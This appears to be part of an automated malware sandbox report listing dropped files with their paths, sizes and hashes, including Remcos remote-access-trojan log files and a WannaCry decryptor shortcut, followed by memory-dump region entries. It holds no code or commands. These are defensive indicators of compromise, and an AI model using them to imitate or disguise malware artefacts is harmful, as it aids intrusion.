C:\Users\Admin\Downloads\Unconfirmed 250773.crdownload

Filesize
4.0MB

MD5
1d9045870dbd31e2e399a4e8ecd9302f

SHA1
7857c1ebfd1b37756d106027ed03121d8e7887cf

SHA256
9b4826b8876ca2f1378b1dfe47b0c0d6e972bf9f0b3a36e299b26fbc86283885

SHA512
9419ed0a1c5e43f48a3534e36be9b2b03738e017c327e13586601381a8342c4c9b09aa9b89f80414d0d458284d2d17f48d27934a6b2d6d49450d045f49c10909

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 283891.crdownload

Filesize
31KB

MD5
29a37b6532a7acefa7580b826f23f6dd

SHA1
a0f4f3a1c5e159b6e2dadaa6615c5e4eb762479f

SHA256
7a84dd83f4f00cf0723b76a6a56587bdce6d57bd8024cc9c55565a442806cf69

SHA512
a54e2b097ffdaa51d49339bd7d15d6e8770b02603e3c864a13e5945322e28eb2eebc32680c6ddddbad1d9a3001aa02e944b6cef86d4a260db7e4b50f67ac9818

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 374402.crdownload

Filesize
1.2MB

MD5
7621f79a7f66c25ad6c636d5248abeb9

SHA1
98304e41f82c3aee82213a286abdee9abf79bcce

SHA256
086d35f26bd2fd886e99744960b394d94e74133c40145a3e2bc6b3877b91ec5d

SHA512
59ffcf6eeac00c089e9c77192663d0dc97b2e62cedb6d64fe7dc2e67499abc34e33977e05113c9d39ca6d3e37e8b5c3e6aa926c8526215808b147c0152f7dbfd

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 374402.crdownload:SmartScreen

Filesize
7B

MD5
4047530ecbc0170039e76fe1657bdb01

SHA1
32db7d5e662ebccdd1d71de285f907e3a1c68ac5

SHA256
82254025d1b98d60044d3aeb7c56eed7c61c07c3e30534d6e05dab9d6c326750

SHA512
8f002af3f4ed2b3dfb4ed8273318d160152da50ee4842c9f5d9915f50a3e643952494699c4258e6af993dc6e1695d0dc3db6d23f4d93c26b0bc6a20f4b4f336e

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 465196.crdownload

Filesize
92KB

MD5
fb598b93c04baafe98683dc210e779c9

SHA1
c7ccd43a721a508b807c9bf6d774344df58e752f

SHA256
c851749fd6c9fa19293d8ee2c5b45b3dc8561115ddfe7166fbaefcb9b353b7c4

SHA512
1185ffe7e296eaaae50b7bd63baa6ffb8f5e76d4a897cb3800cead507a67c4e5075e677abdbf9831f3f81d01bdf1c06675a7c21985ef20a4bae5a256fd41cc0f

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 575659.crdownload

Filesize
84KB

MD5
b6e148ee1a2a3b460dd2a0adbf1dd39c

SHA1
ec0efbe8fd2fa5300164e9e4eded0d40da549c60

SHA256
dc31e710277eac1b125de6f4626765a2684d992147691a33964e368e5f269cba

SHA512
4b8c62ddfc7cd3e5ce1f8b5a1ba4a611ab1bfccf81d80cf2cfc831cffa1d7a4b6da0494616a53b419168bc3a324b57382d4a6186af083de6fc93d144c4503741

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 621006.crdownload

Filesize
756KB

MD5
c7dcd585b7e8b046f209052bcd6dd84b

SHA1
604dcfae9eed4f65c80a4a39454db409291e08fa

SHA256
0e8336ed51fe4551ced7d9aa5ce2dde945df8a0cc4e7c60199c24dd1cf7ccd48

SHA512
c5ba102b12d2c685312d7dc8d58d98891b73243f56a8491ea7c41c2edaaad44ad90b8bc0748dbd8c84e92e9ae9bbd0b0157265ebe35fb9b63668c57d0e1ed5f2

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 655710.crdownload

Filesize
225KB

MD5
af2379cc4d607a45ac44d62135fb7015

SHA1
39b6d40906c7f7f080e6befa93324dddadcbd9fa

SHA256
26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739

SHA512
69899c47d0b15f92980f79517384e83373242e045ca696c6e8f930ff6454219bf609e0d84c2f91d25dfd5ef3c28c9e099c4a3a918206e957be806a1c2e0d3e99

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 70457.crdownload

Filesize
321KB

MD5
600e0dbaefc03f7bf50abb0def3fb465

SHA1
1b5f0ac48e06edc4ed8243be61d71077f770f2b4

SHA256
61e6a93f43049712b5f2d949fd233fa8015fe4bef01b9e1285d3d87b12f894f2

SHA512
151eebac8f8f6e72d130114f030f048dff5bce0f99ff8d3a22e8fed7616155b3e87d29acf79f488d6b53ed2c5c9b05b57f76f1f91a568c21fe9bca228efb23d9

Download Submit
C:\Users\Admin\Downloads\u.wry

Filesize
236KB

MD5
cf1416074cd7791ab80a18f9e7e219d9

SHA1
276d2ec82c518d887a8a3608e51c56fa28716ded

SHA256
78e3f87f31688355c0f398317b2d87d803bd87ee3656c5a7c80f0561ec8606df

SHA512
0bb0843a90edacaf1407e6a7273a9fbb896701635e4d9467392b7350ad25a1bec0c1ceef36737b4af5e5841936f4891436eded0533aa3d74c9a54efa42f024c5

Download Submit
C:\Windows\SysWOW64\remcos\logs.dat

Filesize
989B

MD5
41f91638665e82f79f51900ccaf8e480

SHA1
8bda441f27051784c0e3cd73da1df6488ce18ede

SHA256
1570c769fff8d4670e7b8f4a550feaabca196d893afb8e7a8679771df9c7e312

SHA512
1f58544f7b1a765b75d63f8ef50fbcaef40faf5828ad8477eadb0f126a01edf5e5ad09c3241e55dcee19473bb613c1cd99cc5784cee0b6e5dee2a81b90b6611e

Download Submit
C:\Windows\SysWOW64\remcos\logs.dat

Filesize
1KB

MD5
8c68c34e9e7fc3af91fce76b4af21bed

SHA1
c51d8cdc22fb891655c2419cc8ee4b579ead06dc

SHA256
d1789e694c2f515c5077def696009a715717f1c2efe476a2375a1d1f489b01ee

SHA512
6ad6d6070052077400ea8106d58fb379c26cf238b56cbc8fa9ba9da02466c7f15680e5b10a6dcf37c589cf3033909178f4beaf23ff51dad3487a4d37010663ed

Download Submit
C:\Windows\SysWOW64\remcos\logs.dat

Filesize
1KB

MD5
abb8c37c05f93275584f7d4adc8e9eeb

SHA1
2079fb89b44060d2794406c60b743ced29d5b1a8

SHA256
3811dfb15b324e0fb125d7eba92f887e2f5f0b7086eeff7b35bbfaef29993a70

SHA512
896fe5c5507b250447ba605851b746f0efc13fce7206277a48ca20dfd8d68b52e0e8bcf0c673812ab2d7d247b346332569ce11fab6a97c081f81718de63e8cf0

Download Submit
C:\Windows\SysWOW64\remcos\logs.dat

Filesize
94B

MD5
c8df45b76f78f97d3b35ed0906d481c7

SHA1
33e18c7626a4294a29336ab1f6a60720aa7e7f06

SHA256
1cf156d30a2cc17ea91cf51d908bd5f70b324b298e29c6c6b3cab04bfa7b70f6

SHA512
7e7d8eabd3317ce99e6bf25dc1cb29ff3784f6bb1485766f3ae94f5399d9834198075d9cc2010f1d59972c38614dffba44276ea584a5131cf9ae2c4e47fff968

Download Submit
C:\Windows\SysWOW64\remcos\logs.dat

Filesize
354B

MD5
010218b2f6b1dd884159ee2aa16da684

SHA1
b0e4d5ae34a91f5c8e3028bebf27802cb5fa6700

SHA256
50f39a98d5ff99aff4e5632d0ac0311b63060fc8ce1197ae738a4d7e75348786

SHA512
b3e5d45ffaf9e376b3533f8c9aa552963fdd0fb24ba99618214449120c364529fb66e67f16b908668b251f24ada60b8512ddad29e538a1902f8ab0118d702a95

Download Submit
C:\Windows\SysWOW64\remcos\logs.dat

Filesize
390B

MD5
bc33958d7343a58500ac0fa6816d4fb1

SHA1
4cea6a1b2f6da416ca6bfe934fa3843d028c7332

SHA256
38e8545216e24ac60ea05f99df83c6e102664baf1a6e122e61705cc34e2fa8f2

SHA512
b11b19fd442d6c2c2613764645d962916cf26b044c7909005f80872f2216dee81f5ae074a3c42e1d190fc823bb0318404b1563fb7cff6a344ef400919b8a2a04

Download Submit
C:\Windows\SysWOW64\remcos\logs.dat

Filesize
1KB

MD5
3a90884b91a08edb9fd817352520984b

SHA1
b41d5019ae621cc6b1911217668fb5157104e625

SHA256
53d25dac89247ebdbb7ea8418a1ce808bcf07a585a0212ded600a698a4af70be

SHA512
a1440b1f9e5fb2ba16622dfbeac8afa54938137c95b1af6a9746ea4ac78fa458fa5e62f7095183844c8a835bec55e78495956d2cb6908aac641d2a92c069672f

Download Submit
C:\Windows\SysWOW64\remcos\logs.dat

Filesize
2KB

MD5
22ee75ed9f9842c35ba5dac008c1440b

SHA1
d608eeb129bc81f059c5186a2232ecf49b9b6ed1

SHA256
c368bac5f0e132cf54588f0944ba580b0f61d6d390c8fa8bdc24ea402924e6f8

SHA512
020173c1446081851b3da8d34da4375ef6f513d9c826ccbb781073ef3b42393e99238225bd54bdc3d301b1e9d189fde98ac1a3983bdb42f1db7b5aa7a34024f7

Download Submit
C:\Windows\SysWOW64\remcos\logs.dat

Filesize
2KB

MD5
6e341dc29925f7ddb46e88be54a56dfa

SHA1
6b77b96b542e07036ecd2d60d9178245a7a16973

SHA256
ab22d0ad60a4c9f86fb9fa419e9f9a1b2d8db585ba228e2b97d34eeafb032624

SHA512
ab9d5d4be0ae0301d5930a94a87efd322a1df0800b1b5b675205c987a1a67f368f0cdb48b2d881a545062ecf03ad2fd6489fab299066610864327e6aa1755e4f

Download Submit
C:\Windows\SysWOW64\remcos\logs.dat

Filesize
2KB

MD5
c91d6a7f6b9dd3a6d5e9fd2877b9ba2e

SHA1
bc153b391db2c6b0985495ce032c8e69ba0e8a3f

SHA256
bbdf516c823de9f414e253951d2b54dd6245ef49c088b7274756f5dbb4dbc6ea

SHA512
057aa2853c3e86ba87e0dca90c6748c78871f9f1cc5080bed21c4a26522a8ba1a25f48f85d10912b19c574e74d8881c8dcd3904f40d170c3f6128b79791ceec1

Download Submit
C:\Windows\SysWOW64\remcos\logs.dat

Filesize
2KB

MD5
7ff53cfb932ac1ef1138344590630edb

SHA1
5f56734c94c8713e2be1d3b8406da147caf3f895

SHA256
5a683fce675a9aae2e5e6a39ad5f9ba52b7d1daeed44cc0dd67241db88b2f3db

SHA512
f9698faac99f2d196184f05af3b5281a047b8a43d04b687890a41b1c32bebb61ce2f39a510af1a334833d3d0e93418cb34f96be2a5901a654d3c9eda3ef1fd05

Download Submit
C:\Windows\SysWOW64\remcos\logs.dat

Filesize
2KB

MD5
d2ec64c18d6c5f707c41930098f8cde7

SHA1
b215751c1a6b91d3f55166b9c9e2b17c87c16cdb

SHA256
25d54afcb44ec588ef206ac8a8a1a22645a979d2208903870b05de022722fa52

SHA512
6d0c2f40eb1ea29307beedc1f7b99df5c013f3a55a3af89fa90372b155b61e0ade0f1118ce53a2188a42c92a9e2ba7aff304d5a55fe2520d60fe1d007af8c8e5

Download Submit
C:\Windows\SysWOW64\remcos\logs.dat

Filesize
2KB

MD5
4d7d89bb1f92309b133646674dacd1c6

SHA1
9c8a6b8cb979b0c2872c04f7925c53ed80cdd6dd

SHA256
ec6a0f92017bc4ec2df0a12e73b3a8cec551a759bdcab7947fbf87aa479e0cec

SHA512
e20629575aa0dbbcf608165c4c2363ee6cb9344b749fa34b0c32ab5a8f555fe3ace7c63799c48415f0f7692239e8b77207083a57e21f331755e64125e310b23e

Download Submit
C:\Windows\SysWOW64\remcos\logs.dat

Filesize
3KB

MD5
ff6ba691935903429d354806bd824af3

SHA1
caf5f22badc247adab8e891bd506033a1dc9905b

SHA256
19df57f18a6d8ec0f1aeaec324ffc6e8464ca0dde295a6afd738b6328bc3a2dd

SHA512
a05a266a332aac8725ead45f9bba365a023a0f2446a132e975f376cf1526bfc0b4c720dec37c9b94ab80a4f0855162e32c5383f9681f06efc43f6e1a9ce88d6d

Download Submit
C:\Windows\SysWOW64\remcos\logs.dat

Filesize
3KB

MD5
68b388334d359bfc34bb4a35bbf6a031

SHA1
cb492296d5e8abcc3b0561c514177240ad1328ce

SHA256
2dae3ce927f34a00dff484f204e91c9f30bd3373380ca61037921dd94776f433

SHA512
0aac1de282d152c75171fba29f23751d34ffceef13265bf8d8d477378f540108c7eb02d67ec20207a6d7c34f41d5a33e0ad287d9ac2da5d513c9c334cbddcfcc

Download Submit
C:\Windows\SysWOW64\remcos\logs.dat

Filesize
3KB

MD5
709c99f4579101ec49d88f8d1f18fb7d

SHA1
1df6b9e1086db00af4070faab67d86b8262d194d

SHA256
3fb37c60a7fa3f200e98260f87d48e0574cc7bf6a40bbe0250c1b9558c1107a4

SHA512
2ea7318e985ec58daedff6a4f799db27f6ec87978c6ecfbb81b3b7bf1a0e8ca6f74fd70e15dbde14277684559d630c4510ad370e40f939493c80c054b8ae6798

Download Submit
C:\Windows\SysWOW64\remcos\logs.dat

Filesize
3KB

MD5
ae588b12143bd6685e52bfca623e0efb

SHA1
8f229d4dd630e1bcd522cd7918c1f00005228625

SHA256
990994584ac71cdc310e56d6a8cda26bdd4eed2f35d3455861bab66871ae0912

SHA512
ff08830b959cb73120a0114c87a256cdfa13c4c824ccfe5074c3cb2130c89b94c9bae2581d728fbf4e1fb2aa7eb33a9e1a68f4edf3fd7e48ab893f1e950d0154

Download Submit
C:\Windows\SysWOW64\remcos\logs.dat

Filesize
3KB

MD5
b8ce3021eaaebef7e3c0a62be9e33a8a

SHA1
34345bd44216d92f79f3b4e6f0e081630969e5a9

SHA256
02839cded0d4f330d94c28ca77299163077bfe74f610b6c9b8eae20204cebc3c

SHA512
8ed5b4d34796d219b4f4818f395dbf66c94fdf49a84915150ebf313c92593f79e1945951b4248f427b9b09de8d81527c8462c5dccd15b31872e79922e890d138

Download Submit
C:\Windows\SysWOW64\remcos\logs.dat

Filesize
4KB

MD5
4f871e25355d587444d15b09c2b93ba2

SHA1
ede126169c214ae83972a01e1264d123990197d9

SHA256
09ce97a9fcac7c309cbc9a3473e194d1acd01ed4e2bdfec70c1d0911c028e4ef

SHA512
55de59652e53296e815b68da5b34f9a9ff6f257165f982fb6b26e573133c933aa3a25a56f32f858f33124a9dea6a6cbd277fb7901184c2abd32d3e33ccebdbe9

Download Submit
C:\Windows\SysWOW64\remcos\logs.dat

Filesize
791B

MD5
fa80935855f06773da3dd158827aea73

SHA1
116e77d19ca0237e71b458007a4ae9f2ed612d3e

SHA256
e6f0aa4daf9fd4e55016da8858887953b1ebe4caa6d213b2aec18360a19764b6

SHA512
eac8c3e08c5e6909b3ee1fea369301b82e587ad0c219125bfca69ec64fbca2b31f2643283f98c06678a2c837dca27e26b774eb3a399b31489130407017f2ed98

Download Submit
C:\Windows\SysWOW64\remcos\logs.dat

Filesize
827B

MD5
40b6c887b21035451fec0c75ec26b127

SHA1
e0fa74b3ff90df1bab5812910f6108141198dfd3

SHA256
176e812fd77403e71058316bdcef22f588522b394d1645e8f6e8185963716cf5

SHA512
a66ab58d6145e176158ca9b654e25e3c132033fdc818f7f56d9c2ba6efb6789e5f2d3ae80b968ee74dbc8420c97a6e656ed775746af8fbe62ac0e64256958f12

Download Submit
C:\Windows\System32\GroupPolicy\gpt.ini

Filesize
127B

MD5
ea3152149600326656e1f74ed207df9e

SHA1
361f17db9603f8d05948d633fd79271e0d780017

SHA256
f895f54a7397294132ebe13da0cf48f00028f5ccc81eac77eecafdec858e7816

SHA512
5f79b3295a6a2c4b5c5720e26741ae5da2008165bcde01472e19362f7ffd4edabaea348bb99c2850871045cfb07fb0e51e6c3db7b2e278732a9f15f5b34f1a52

Download Submit
C:\Windows\_CutButterball

Filesize
64KB

MD5
e3fefdeed3816c1aef9345dd04ea58f8

SHA1
136f648fa239c018ef2e9c30ffab44f447f7f3ec

SHA256
e9aab81d99173d899f053a01f6a56334b37b4cfb5613196442cdab5115f58f1a

SHA512
755a3713ed7eaa6e8aa659c1420dcd1a85d0cfb13fb51f5aa3edfd2498fda93d90138f0d8c87a7dcbcd344d8b03fe6aab4ebdc23840d23e6470165f9569a1634

Download Submit
C:\Windows\_CutButterball

Filesize
128KB

MD5
c3596c727fbf3621b76ba85ce547557c

SHA1
d1d80025cb9049b6a55f2fd9d84e53bc300013b3

SHA256
b781472c0b0745bf56fba1666609042d33d3062da7db2d06407b99c55ccce77c

SHA512
059d4e9b547b18695a5f9a3605c014ad2ce8dd9ca0a600e8e17307e0fc310a22630906e1fa03468776f04d73ed73d6593275e61f0af34ba10d06af72a8e1dd18

Download Submit
C:\Windows\_CutButterball

Filesize
64KB

MD5
bd4330e01ea1206f2a180bfd13d05f35

SHA1
5a6705ae2c2c8d1107e1885290d0eb9fcc56bd55

SHA256
90e00e16d2741b0862a82be67e3dd5a2a16dc04c380c75ce0962ece7e005ea61

SHA512
09a122763246eb020b454d11301f295a165b38fc30ea77f4dd3ae747da1d2fbdf99b85a6d98741d33cec1a219e44a51165404ad431f6dc2c74fd351ad88619d5

Download Submit
C:\Windows\_CutButterball

Filesize
214KB

MD5
76a822afd0a3a23fed7fe78168c61822

SHA1
8d8f712624aa9299e77e1aea6e9ea55bb903af91

SHA256
b938e75b1942a3f023cc882b3ee86c1f2834581434f2ada8fe21afb9f7de870b

SHA512
c41bbb69852ff1f2b6d8f5faf6914f34be6b0d588d5b26ba8b7cb5ffdb586a5a9afa5c8a37c89bbe92e70c2915ae0a976287bf2f2cd4e7ec15d8a8db2120b736

Download Submit
C:\Windows\_CutButterball

Filesize
2KB

MD5
98961dcd3def808540f22b5988e97686

SHA1
18e239feb70b474c4a59b41342decc002d014376

SHA256
9e8d582887f7ce424482c193b401b5366b2420a3f27a8ee88bfb9a47a7316bee

SHA512
f150b7284e41aa35a407084113d31a06fe6911e1dac37d9c183a2a5a7e6c57ce5203b7514bbb91ba1971670eb889bb3daa221b56ba98f3400ca123783ab9b878

Download Submit
C:\Windows\_CutButterball

Filesize
4KB

MD5
91fe6c54890a9236cd73ce8b737cc58e

SHA1
fbcdb6a6139911166d7f30a7ee77e56b3ecd26aa

SHA256
df03489677b85dfc72ddfdecbb4355442361f61cf986b86a5393f73e8afb1988

SHA512
c512162a3f7130f323b36ead739e2939133a61edebc76ac84b8f7666961a7ae8fb509d729f8c738e1d255a013fb8864a117b5d5752bb78625d1e1a895fdca6b5

Download Submit
C:\Windows\_CutButterball

Filesize
38KB

MD5
08add854fa302d5bf3c9a4f59c683a85

SHA1
1f0438fd10b89d8a65ca35e949d173873d68e582

SHA256
4105ed20c38335ed6bc3e67e8c5a030f23fe52da21f111f25052834e6e0b3b0b

SHA512
ac14f98fa824a632b153d6a2170d05475cfc77ea4423b84c86474534f56e18dd12d72b440267fa2f56e590e09448328d7a672937b77e5cb8660589e780651a8f

Download Submit
C:\Windows\_CutButterball

Filesize
38KB

MD5
ef4977f85586c926aa7998cddb7318b9

SHA1
1564ccdf5b4ea239ed91b714e50e7ca9f60dafa9

SHA256
64436a0cdc7f3e33177daa0a1163186c805117d6fdcf4a1a4d1bda43db1a5bcb

SHA512
142c37b5a4298df2f443373b4a1809432e1c50976f289ecdcea7e13a9233ba1c10a80994397baee66a0962d68042cba81feffc4ba34730e2bfedfb65d838c4de

Download Submit
C:\Windows\_CutButterball

Filesize
6KB

MD5
3992c93311afcc0c5939f2b3ae26add9

SHA1
c1e741ae147bc4e20c7b8e4f4a14e57120518f5d

SHA256
5b60b27a459db290084454b279d1f161819ac1179001971e4fea0ba595c22e98

SHA512
4b684e589c085716fa4976cd30f15aa8cb66fb25b82bbf63d8b54ef5d6a0901269dfeae15cea46f9d3b53f3346a85f172e663e7323d2468fc8da42375f2a08f0

Download Submit
C:\Windows\_CutButterball

Filesize
82KB

MD5
bdd69d5430a3b562d5e296906bdfc9a1

SHA1
062ccd020cc99913d6504bc2cb048513a9d9e7c1

SHA256
4fcc460cceecc5e498574a08bfd1ee97ad5979a83604a6f4fb09a03943d66e31

SHA512
75ed019595ec6c34be0068718819710286fe6b24a53055992998db639370c239832886f4adab94630d960ae4525764271b02a4fd4149897a5575571152fd34d5

Download Submit
C:\Windows\_CutButterball

Filesize
64KB

MD5
5ebc158d25abf6d7a6f7c77732c62ea5

SHA1
42712252049ccc038a28a93b347eeebcc215db58

SHA256
26d12db0d2fd05f8cae7b6dd111d52d06f1d897cdb67651f9480864573e0e9cd

SHA512
0659e792e02c88884b8d942baaa6de9c75678669b340a8be587f45598ab59a22179948fd3faa3c4567be61be5769fe731c14dad27be024f4c74151d068790e86

Download Submit
C:\Windows\_CutButterball

Filesize
126KB

MD5
88da9a1c67e3b77350c94a70a1b82330

SHA1
7e5a77e63f3d5be3e0a72d224640c1667082eb47

SHA256
efe72b411c43b131ae9bddd139a39c298ffaafb654516fc84534a6a0efb6b169

SHA512
372ec3da0abff9c58553f57edb5c72167b4567f0552017a361354b2f1aa1dcc87f6dc7dac426acd51d57535b4fcd468f413851881f18fac1975abbfdff7612f5

Download Submit
C:\Windows\_CutButterball

Filesize
128KB

MD5
8a6ee5412fde9565ebd19d22970685d7

SHA1
068c1f9609907bd7c293a6a1b45bb0b7b5be46e6

SHA256
16e6595608c7b7b7d4ff3209b476ce3262648d2fe02b69cd1e484a6faddcf206

SHA512
c87f392bd0299f874de78622bf26f1f2a623acb43b8aa2e43bb5e635d23ca5a21b4c90329383fdd73a597d72af3c3270c81891ef12bf5e77a8c5dc5dc6367354

Download Submit
C:\Windows\_CutButterball

Filesize
249KB

MD5
89b83ad4eb82fa8a835cb2e8d4b094a0

SHA1
c8e3d7760626427f311cae8c0a33376f86de6a55

SHA256
de25e15228dd2fefd855dab9ca1ed7f3f8e1918e69a27723d53763e43feb5bb4

SHA512
e78f619377306261f1811402d477e8b8a6a90d6662f9ee44ca08d87a21ccb72f6749b2d4e3a5c377ced7e8e0324b16bb8b007ce540cea5cb32fe287f8d388042

Download Submit
C:\Windows\_CutButterball

Filesize
64KB

MD5
e82930f7aa2f73f2c122b488b4b76c23

SHA1
7b158898824df5474f08200ad94cf0a9c340c747

SHA256
ecc3122926e3cd7128786a51a5ed090659cfd802697f421f2dc6509a76009a4a

SHA512
398d7221a85c0ce0053db60aa731d6a11fa7e417b304732c3119fc617e7d3ccbc9108cf226823d892b584d84cd466bd2b0ff20111c31901beb79c15b06dc08f2

Download Submit
C:\Windows\_CutButterball

Filesize
64KB

MD5
686ff810a5ae9e983bb04ba43f5aa949

SHA1
da2b21405b17151b5c78a2eae888472feadeaedd

SHA256
701822a832eaef91ce8936d3e9b930a420f0a7c1687c3bf48aaff4f5e603f2e1

SHA512
d1f2e8b3d15acdde99f35aee5abab8b74f281113d9276cf30dc0894b63d301ee9768e6aae33b14b7535b25a686b43e7caa94235b6f12d5744e988fec5ce61cf6

Download Submit
C:\Windows\_CutButterball

Filesize
256KB

MD5
f384a523d1e0a293a87c4c61ed68f09b

SHA1
325bc802542adf8ae5c419f5251391f7cfc08613

SHA256
9dd4949c8bd750b361d2b158d49f5f8ae2db8ece266a616a0b38cf193dbf64a7

SHA512
f1c6c9d7086543a750d175f4a3ceb2984241c5f90f78ae0d55e86feb9bef791418b9a366212892da489f7b6a310882c20d768305ac5a46a117d1a51889473be3

Download Submit
C:\Windows\_CutButterball

Filesize
128KB

MD5
257095d93cd77d15cb673b46fe0e5c08

SHA1
61f7b69da96470f069bc05e48d87f28f47b669de

SHA256
da75d99e962246596d275e7c622a34a2fddff1051e6ed5181225c3cf63ec8326

SHA512
3828bc65a6e9cb5bf31599df01730f68b1efe643c20f80194b23a064f57912e016ea858e4fda18ad4fb3cec7d4489707469c636b9a7f797d0a13e618b19eb5ed

Download Submit
C:\svchost\!WannaDecryptor!.exe.lnk

Filesize
590B

MD5
a3673a3dedefffe200c8298ba49b3c44

SHA1
469e5eaffaf851a3d09811e2cf21d90a29b0f876

SHA256
72a7c08758b27be9775014f7e5dd27e69a8f7a88a3851683548b3eb808365b26

SHA512
53d8fe3664e7fc00bda467292cbe23bb9d48b2bc3965a4011f41c49765880297e45d39c28e9ac0bb31a7af7b368106f076a99dfab4b082dc29f5f3efa94c7a42

Download Submit
memory/428-767-0x00000000741D0000-0x0000000074781000-memory.dmp

Filesize
5.7MB

Download
memory/428-764-0x00000000741D0000-0x0000000074781000-memory.dmp

Filesize
5.7MB

Download
memory/428-765-0x0000000000630000-0x0000000000640000-memory.dmp

Filesize
64KB

Download
memory/836-778-0x0000000002A40000-0x0000000002A41000-memory.dmp

Filesize
4KB

Download
memory/1364-781-0x00000000006B0000-0x00000000006B1000-memory.dmp

Filesize
4KB

Download
memory/1364-1636-0x0000000010410000-0x000000001047E000-memory.dmp

Filesize
440KB

Download
memory/1364-780-0x00000000001F0000-0x00000000001F1000-memory.dmp

Filesize
4KB

Download
memory/1364-1818-0x0000000010410000-0x000000001047E000-memory.dmp

Filesize
440KB

Download
memory/1364-1747-0x0000000010410000-0x000000001047E000-memory.dmp

Filesize
440KB

Download
memory/1420-761-0x00000000013D0000-0x00000000013E0000-memory.dmp

Filesize
64KB

Download
memory/1420-1638-0x00000000741D0000-0x0000000074781000-memory.dmp

Filesize
5.7MB

Download
memory/1420-763-0x00000000741D0000-0x0000000074781000-memory.dmp

Filesize
5.7MB

Download
memory/1420-760-0x00000000741D0000-0x0000000074781000-memory.dmp

Filesize
5.7MB

Download
memory/1420-758-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/1716-1736-0x00000000023C0000-0x00000000023D0000-memory.dmp

Filesize
64KB

Download
memory/2636-1722-0x0000000002610000-0x0000000002620000-memory.dmp

Filesize
64KB

Download
memory/2888-783-0x0000000000400000-0x0000000000553000-memory.dmp

Filesize
1.3MB

Download
memory/2888-748-0x0000000000400000-0x0000000000553000-memory.dmp

Filesize
1.3MB

Download
memory/2888-743-0x0000000000400000-0x0000000000553000-memory.dmp

Filesize
1.3MB

Download
memory/2888-746-0x0000000000400000-0x0000000000553000-memory.dmp

Filesize
1.3MB

Download
memory/3768-752-0x000000001B910000-0x000000001BDDE000-memory.dmp

Filesize
4.8MB

Download
memory/3768-753-0x0000000000F40000-0x0000000000F50000-memory.dmp

Filesize
64KB

Download
memory/3768-756-0x00007FF939540000-0x00007FF939EE1000-memory.dmp

Filesize
9.6MB

Download
memory/3768-755-0x000000001C000000-0x000000001C062000-memory.dmp

Filesize
392KB

Download
memory/3768-754-0x000000001BE90000-0x000000001BF36000-memory.dmp

Filesize
664KB

Download
memory/3768-759-0x00007FF939540000-0x00007FF939EE1000-memory.dmp

Filesize
9.6MB

Download
memory/3768-751-0x00007FF939540000-0x00007FF939EE1000-memory.dmp

Filesize
9.6MB

Download
memory/4456-1886-0x0000000002330000-0x0000000002340000-memory.dmp

Filesize
64KB

Download
memory/4556-1872-0x00000000023D0000-0x00000000023E0000-memory.dmp

Filesize
64KB

Download
memory/4716-730-0x0000000005670000-0x0000000005680000-memory.dmp

Filesize
64KB

Download
memory/4716-734-0x0000000005CC0000-0x0000000005D5C000-memory.dmp

Filesize
624KB

Download
memory/4716-729-0x0000000074970000-0x0000000075121000-memory.dmp

Filesize
7.7MB

Download
memory/4716-747-0x0000000074970000-0x0000000075121000-memory.dmp

Filesize
7.7MB

Download
memory/4716-731-0x0000000005E30000-0x00000000063D6000-memory.dmp

Filesize
5.6MB

Download
memory/4716-735-0x0000000005C20000-0x0000000005C48000-memory.dmp

Filesize
160KB

Download
memory/4716-732-0x0000000005920000-0x00000000059B2000-memory.dmp

Filesize
584KB

Download
memory/4716-728-0x00000000009D0000-0x0000000000A26000-memory.dmp

Filesize
344KB

Download
memory/4716-733-0x00000000054D0000-0x00000000054D8000-memory.dmp

Filesize
32KB

Download
memory/4912-1907-0x0000000002540000-0x0000000002550000-memory.dmp

Filesize
64KB

Download
memory/4960-1702-0x00000000741D0000-0x0000000074781000-memory.dmp

Filesize
5.7MB

Download
memory/4960-1704-0x00000000741D0000-0x0000000074781000-memory.dmp

Filesize
5.7MB

Download
memory/4960-1703-0x00000000010E0000-0x00000000010F0000-memory.dmp

Filesize
64KB

Download
memory/4960-1852-0x00000000741D0000-0x0000000074781000-memory.dmp

Filesize
5.7MB

Download
memory/4960-1854-0x00000000010E0000-0x00000000010F0000-memory.dmp

Filesize
64KB

Download
memory/5508-1826-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/5624-1750-0x00000000021C0000-0x00000000021D0000-memory.dmp

Filesize
64KB

Download
memory/5756-1763-0x000001FA66670000-0x000001FA6668E000-memory.dmp

Filesize
120KB

Download
memory/5756-1769-0x00007FF92C650000-0x00007FF92D112000-memory.dmp

Filesize
10.8MB

Download
memory/5756-1773-0x000001FA68D30000-0x000001FA68D40000-memory.dmp

Filesize
64KB

Download
memory/5756-1853-0x00007FF92C650000-0x00007FF92D112000-memory.dmp

Filesize
10.8MB

Download
memory/5856-1772-0x00007FF95C940000-0x00007FF95CB49000-memory.dmp

Filesize
2.0MB

Download
memory/5856-1643-0x00007FF95C940000-0x00007FF95CB49000-memory.dmp

Filesize
2.0MB

Download
memory/5856-1641-0x00007FF95C940000-0x00007FF95CB49000-memory.dmp

Filesize
2.0MB

Download
memory/5856-1639-0x00007FF95C940000-0x00007FF95CB49000-memory.dmp

Filesize
2.0MB

Download
memory/5856-1645-0x00007FF95C940000-0x00007FF95CB49000-memory.dmp

Filesize
2.0MB

Download
memory/5856-1646-0x00007FF95C940000-0x00007FF95CB49000-memory.dmp

Filesize
2.0MB

Download
memory/5856-1648-0x00007FF95C940000-0x00007FF95CB49000-memory.dmp

Filesize
2.0MB

Download
memory/5856-1649-0x00007FF95C940000-0x00007FF95CB49000-memory.dmp

Filesize
2.0MB

Download
memory/5856-1651-0x00007FF95C1A0000-0x00007FF95C25D000-memory.dmp

Filesize
756KB

Download
memory/5856-1650-0x00007FF95C940000-0x00007FF95CB49000-memory.dmp

Filesize
2.0MB

Download
memory/5856-1652-0x00007FF95C940000-0x00007FF95CB49000-memory.dmp

Filesize
2.0MB

Download
memory/5856-1654-0x00007FF95C1A0000-0x00007FF95C25D000-memory.dmp

Filesize
756KB

Download
memory/5856-1748-0x00007FF95C940000-0x00007FF95CB49000-memory.dmp

Filesize
2.0MB

Download
